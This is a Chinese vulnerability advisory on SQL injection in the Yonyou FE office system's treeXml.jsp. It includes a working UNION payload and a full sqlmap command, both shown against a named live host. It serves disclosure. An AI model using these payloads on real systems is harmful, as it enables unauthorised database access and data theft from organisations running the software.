用友FE协作办公系统SQL注入漏洞(一)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 用友FE协作办公系统某处过滤不严,导致SQL注入漏洞 ### 详细说明: 用友FE协作办公系统某处过滤不严,导致SQL注入漏洞,可直接union注入 ``` 注入链接:/sys/treeXml.jsp?Si06=1&type=sort 注入参数:Si06 Payload: Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort Sqlmap命令: python sqlmap.py -u 'http://xxxx//sys/treeXml.jsp?Si06=1&type=sort' -p Si06 --dbms mssql --level 5 --risk 3 --technique=U --union-cols=14 --dbs --threads 10 --batch -v 3 ``` ### 漏洞证明: ``` (1)http://oa.hzuf.com:9090 UNION注入: http://oa.hzuf.com:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort ``` [<img src="https://images.seebug.org/upload/201411/01005456250377cef47ec67a334d1609bfd8dbfb.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01005456250377cef47ec67a334d1609bfd8dbfb.png) ``` Sqlmap注入: $ python sqlmap.py -u 'http://oa.hzuf.com:9090/sys/treeXml.jsp?Si06=1&type=sort' -p Si06 --dbms mssql --level 5 --risk 3 --technique=U --union-cols=14 --dbs...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息